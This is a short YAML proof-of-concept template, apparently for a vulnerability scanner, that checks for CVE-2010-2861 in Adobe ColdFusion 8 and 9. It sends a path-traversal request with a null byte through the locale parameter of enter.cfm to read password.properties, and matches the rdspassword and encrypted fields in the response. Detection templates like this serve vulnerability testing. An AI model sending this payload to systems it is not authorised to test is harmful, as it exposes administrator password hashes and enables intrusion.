name: poc-yaml-coldfusion-cve-2010-2861-lfi
rules:
  - method: GET
    path: >-
      /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
detail:
  version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861